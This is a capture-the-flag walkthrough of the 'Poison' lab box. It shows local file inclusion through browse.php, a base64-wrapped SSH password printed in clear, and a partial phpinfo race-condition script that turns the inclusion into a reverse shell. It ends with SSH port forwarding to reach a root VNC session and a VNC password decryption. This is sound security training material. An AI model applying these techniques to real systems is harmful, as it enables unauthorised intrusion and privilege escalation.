Poison is a Medium box. Initial access comes either from an LFI combined with the phpinfo race-condition technique, or more directly by decoding a repeatedly base64-encoded file to recover the user's SSH password. Root is obtained by forwarding the VNC port, which listens only on localhost, to our machine and logging in as root.
Let's begin with our initial Nmap scan.
Nmap Scan Results
PORT   STATE SERVICE  VERSION
22/tcp open  ssh      OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  ssl/http Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (94%), FreeBSD 9.1-STABLE (92%), FreeBSD 7.0-RELEASE (91%), FreeBSD 12.0-CURRENT (90%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   203.44 ms 10.10.14.1
2   203.51 ms 10.10.10.84
This webpage lists some PHP files, and the
Scriptname field will display them for us.
Here I tried to view
phpinfo, and it actually worked. Note also that the parameter is what locates the files.
Likewise, I started checking all the files. Here we can see one more file called
Getting User Shell
Checking that file reveals that it contains base64-encoded data, and it is encoded 13 times over.
So I decoded it repeatedly using CyberChef and ended up with what looks like a password.
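The same repeated decoding, written as a small script (an added example, not part of the original writeup). The box's real secret is not reproduced; a constructed placeholder is wrapped 13 times and then peeled back, stopping when the data no longer looks like base64.

```python
import base64
import binascii
import re

# Constructed placeholder standing in for the page's recovered secret.
PLACEHOLDER_SECRET = b"placeholder-password"
LAYERS = 13  # the writeup found the file encoded 13 times

# Canonical base64 alphabet with optional padding; whitespace is handled separately.
_B64 = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def wrap(data: bytes, layers: int) -> bytes:
    """Base64-encode `data` repeatedly, `layers` times (builds a test input)."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


def peel(blob: bytes, max_layers: int = 64):
    """Strip nested base64 layers until the data no longer looks like base64.

    Returns (plaintext, layers_removed). Heuristic: a layer is removed only if
    the current data (ignoring line wrapping) is valid base64 and decodes to
    printable ASCII; an all-alphanumeric plaintext could still be over-peeled.
    """
    data = blob
    layers = 0
    while layers < max_layers:
        compact = re.sub(rb"\s+", b"", data)  # tools often wrap lines
        if not compact or len(compact) % 4 != 0 or not _B64.match(compact):
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break
        if not all(32 <= b < 127 for b in decoded):
            break  # binary output: we have gone one layer too far
        data = decoded
        layers += 1
    return data, layers


if __name__ == "__main__":
    text, n = peel(wrap(PLACEHOLDER_SECRET, LAYERS))
    print(f"{n} layers removed -> {text!r}")
```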
We know that
backup.php uses a parameter called
file, so I tried for any possible LFI and was able to read
/etc/passwd. Here we can see another user called charix.
I then tried logging in over SSH with the creds we got:
charix : Charix!2#4%6&8(0
We know that we can view the PHP info page and that there is also an LFI. The phpinfo race-condition technique combines the two and can turn an LFI vulnerability into remote code execution (RCE). There is a python script for this,
and I changed a few things in it:
- Give the exact location of phpinfo.php
- Change the GET request to /browse.php?file= because this is where we found the LFI
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
#modify this to suit the LFI script
LFIREQ="""GET /browse.php?file=%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
- Added my IP address and the port on which I need to listen
Now, if I run the script,
I get a shell as
When checking the home directory, I found
I downloaded it to my machine and extracted it. It asked for a password; I used the same charix SSH password and it extracted.
But the file looks different from what I expected.
When checking the running processes, I found that VNC is running as root.
charix@Poison:~ % ps aux
. . .
root  529  0.0  0.9 23620 9064 v0- I  05:59  0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800
I checked whether the port is open; 5901 is the port VNC usually listens on.
charix@Poison:~/.vnc % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.64487      10.10.14.20.3333       ESTABLISHED
tcp4       0      0 10.10.10.84.80         10.10.14.20.41928      CLOSE_WAIT
tcp4       0     44 10.10.10.84.22         10.10.14.20.36254      ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
VNC is bound to 127.0.0.1 only, so I set up local port forwarding over SSH to bring port 5901 to my machine.
root@kali:~/CTF/HTB/Boxes/Poison# ssh -L 5901:127.0.0.1:5901 firstname.lastname@example.org
Now we can try connecting to it using vncviewer. It asks for a password, so I guessed that the
secret file we got from the zip might be the password file.
And it worked: I logged in as root.
We own the box!!
We can also decrypt the VNC password stored in that file using this tool (VNC password files are only obfuscated, not protected).
root@kali:~/CTF/HTB/Boxes/Poison/vncpasswd.py# python vncpasswd.py -d -f secret
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'